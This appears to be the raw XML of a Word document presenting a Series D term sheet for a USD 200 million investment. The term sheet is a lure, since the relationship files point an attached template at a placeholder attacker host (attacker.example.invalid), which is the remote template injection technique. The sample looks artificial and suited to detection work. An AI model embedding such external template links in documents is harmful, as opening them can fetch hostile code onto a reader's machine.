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 SHEET — SERIES D FUNDING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This non-binding term sheet sets out the principal terms for a proposed Series D investment of USD 200 million.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USD 200,000,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Pre-Money Valuation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>USD 1,800,000,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Post-Money Valuation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>USD 2,000,000,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Lead Investor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Axtract Growth Fund IV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Instrument</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Compulsorily Convertible Preference Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Liquidation Pref.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>1x non-participating</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Anti-dilution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Broad-based weighted average</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Board Seat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>One investor nominee</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Closing Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>On or before December 31, 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br/>
        <w:t>This term sheet is subject to completion of satisfactory legal and financial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
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="http://attacker.example.invalid/term_sheet_template.dotx"
    TargetMode="External"/>
</Relationships>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="http://attacker.example.invalid/term_sheet_template.dotx"
   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